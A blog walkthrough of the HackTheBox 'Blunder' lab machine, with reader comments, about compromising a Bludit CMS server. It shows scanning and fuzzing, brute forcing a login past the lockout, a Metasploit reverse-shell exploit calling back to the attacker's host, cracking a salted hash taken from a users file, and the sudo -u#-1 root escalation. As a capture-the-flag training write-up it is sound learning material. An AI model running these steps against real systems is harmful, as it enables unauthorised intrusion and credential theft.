Blunder HackTheBox Walkthrough

This is Blunder HackTheBox machine walkthrough. In this walkthrough I will demonstrate you how I successfully exploited this machine and got root flag. Before starting let’s know something about Blunder machine. It is a Linux machine and is given difficulty level low by it’s maker with IP address 10.10.10.191.
Now I will show you step by step procedure how to get root flag in blunder machine.
First of all connect your PC with VPN so that you can get access to the lab and ping the IP 10.10.10.191 to make confirm that you are connected with blunder machine. I started by scanning the IP address 10.10.10.191, so that I could get some hint to start. Nmap, a port scanner gave the following results.
Scanning the Machine
$nmap -sC -sC -oN scan 10.10.10.191

Only two ports open??
Let’s perform full port scan in case there may be services running on some other ports which is not listed in nmap’s top 1000 ports.
After full port scan the same result appears.
$nmap -sC -sV -p- -oN full_scan 10.10.10.191

Tip: It is good idea to perform full port scan during CTF hunting or Penetration Testing because there may be chances that some ports are open which don’t come under top 1000 ports of nmap.
Port 21 and 80 is shown. Apache2 web server is running on port 80. After some enumeration found website is running on Bludit CMS
. And the version is 3.9.2
from this URL http://10.10.10.191/bl-kernel/css/bootstrap.min.css?version=3.9.2
As usual my next step is to search if any exploit is available for given CMS. Just googled Bludit CMS 3.9.2 exploit
and found this appropriate link. For more details google CVE-2019-17240
. Also searchsploit give this result.
$searchsploit bludit

There is a metasploit module present for Bludit. After opening this in metasploit I found it requires Username
and Password
. So we needed username and password to use this module
$msfdb run
msf5>search bludit
msf5>show info exploit/linux/http/bludit_upload_images_exec

Left it here and moved forward to find some other information. Used directory brute forcing using dirsearch
and wordlist directory-list-2.3-small.txt
, didn’t find any interesting file. Got some hint from HTB forum about txt file so tried to FUZZ
for hidden text files in the URL.
Fuzzing URL
$wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/common.txt --hc 404,403 -u "http://10.10.10.191/FUZZ.txt" -t 100

Got file todo.txt
. After reading the content at http://10.10.10.191/todo.txt it appears that fergus
is the user. Added it to my note. And started further enumeration.
Tip: It is a good idea to make notes of all interesting finding side by side because sometimes they show you the way how to proceed further.

Now we have got username and we need password. Let’s make our own wordlist using cewl
, a famous wordlist creator.
Creating Custom Wordlist
$cewl -d 3 -m 5 -w custom_wordlist.txt
http://10.10.10.191/

Modify the script at https://rastating.github.io/bludit-brute-force-mitigation-bypass/ as given below. In username use fergus
because we want to brute force on user fergus and in fname use the name of custom wordlist which you have created using cewl command. In my case it is custom_wordlist.txt
. Save it as poc.py
and run it

Cracking Password
$python poc.py

So we have the credentials fergus : RolandDeschain
. It’s time to exploit and get remote shell on our PC.
We have two ways to get shell.
1. Either use metasploit module or
2. Manually upload file to the website by logging in http://10.10.10.191/admin/ with creds fergus : RolandDeschain and intercept using Burp Suite to modify requests. For more info visit https://github.com/bludit/bludit/issues/1079 this link.
I preferred first because it don’t require much effort and you know well how lazy we are in doing things manually if automated things are present. 🙂
Try to use payload php/meterpreter_reverse_tcp
instead of payload
php/meterpreter/reverse_tcp
if later failed to get you proper meterpreter shell
Getting User Shell
$ msfdb run
msf5 > search bludit
msf5 > use exploit/linux/http/bludit_upload_images_exec
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITUSER fergus
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITPASS RolandDeschain
msf5 exploit(linux/http/bludit_upload_images_exec) > set payload
php/meterpreter/reverse_tcp
msf5 exploit(linux/http/bludit_upload_images_exec) > set LHOST 10.10.15.87
msf5 exploit(linux/http/bludit_upload_images_exec) > exploit
meterpreter > sysinfo

Alright, we have got a meterpreter shell. Used $shell
command to upgrade it to system shell and further to fully qualified Linux shell
meterpreter > shell
$which python
$python -c 'import pty;pty.spawn("/bin/bash")'
$www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ export TERM=xterm-256color

So we are in the Blunder HTB machine. Let us grab user flag
. Inside home directory two users hugo
and shaun
are present. User flag is inside hugo folder. But www-data
don’t have permission to read it. Only hugo has permission to read it. Tried $su hugo
in case hugo and fergus have same password but login failed possibly due to incorrect password. To access user flag we have to login with hugo. After manual enumeration found a file users.php
inside the directory /var/www/bludit-3.9.2/bl-content/databases/
.

Got password along with its salt
Password: bfcc887f62e36ea019e3295aafb8a3885966e265
Salt: 5dde2887e7aca
Now we have to crack this password. Hash identifier gave it is a sha1
hash.
Identify Type of Hash

Tried to crack using hashcat
and rockyou.txt
wordlist but could not crack. So tried https://cmd5.com/ site and successfully cracked the hash.
The password is Password120. So the credential is
Hugo : Password120.
Switch user to hugo
$su hugo
Password: Password120
Grab User Flag

Privilege Escalation
Let’s check what special permission does hugo has.
$sudo -l

Tip: Whenever you get a shell try to execute
$sudo -l
check what special command [*] the current user can run. And try to google ‘how to escalate privilege using [*] command’. You may get your answer easily. For example, in this case google (ALL, !root) /bin/bash
Got : User hugo may run the following commands on blunder:
(ALL, !root) /bin/bash
After googling (ALL, !root) /bin/bash
got our privilege escalation vector in first link viz. vulnerable version of sudo. See this link.
After reading the exploit PoC we can easily get our root shell in just one command. Let’s do it
Getting Root Shell
$sudo -u#-1 /bin/bash
Give the password Password120

Grab Root Flag
Grab the root flag from root folder
$cd /root/
$cat root.txt

This is how I got root to the blunder HackTheBox machine. Hope you guys have got something to learn from my approach. Have any issue and question please let me know at [email protected] and in comment section . Thanks for reading this walkthrough.
Want more walkthrough on HackTheBox always visit ethicalhacs.com.
Please post walkthroughs for other boxes too! your website is a great help when i’m stuck somewhere.
Thanks bro. I am working on it
hey Bro- I did pretty much everything only Password Hash cracking is giving problem because cmd5.com is chinese. I tried cmd5.org and many other sha1 decrypter but no luck. Any ideas?
Alternatively, you can get crackable hash at
$www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php
and try to crack the hash at crackstation.net
Hi this cracking procedure didn’t work I tried with crackstation and cmd5.com and was not cracked, I think that is something with the salt possition.
Could you please show us the format that you put in cmd5.com?.
Thanks and regards,
The format is sha1($Salt.$Pass) and this hash is not present on crackstation.net. There is also other hash present in
$www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php. This hash is without salt and can be cracked easily at crackstation.net
Hey! Thanks for the walkthrough. Can you please explain “sudo -u#-1 /bin/bash”. Or give any resources.
I have just taken this exploit from https://www.exploit-db.com/exploits/47502. For more info on Linux Privilege Escalation using Sudo Rights you can check out this link.
Hi, I am currently slightly stuck on on the meterpreter shell upgrade to system shell. I tried different payloads and still not able to proceed further. Only getting this:
meterpreter > shell
Process 2740 created.
Channel 0 created.
^[[A
any idea?
Thank you.
I think when a new channel is created means you have a shell session open and you can interact with this session using normal commands. You may either get a shell prompt or not after running shell command on meterpreter but normal Linux command should always works in a typical shell session created by meterpreter, which is in the above case. Try to run some basic Linux command like whoami, id, ls, etc. to confirm whether you are able to run command or not. If you get output from the command then use python -c ‘import pty;pty.spawn(“/bin/bash”)’ to upgrade the shell to shell prompt.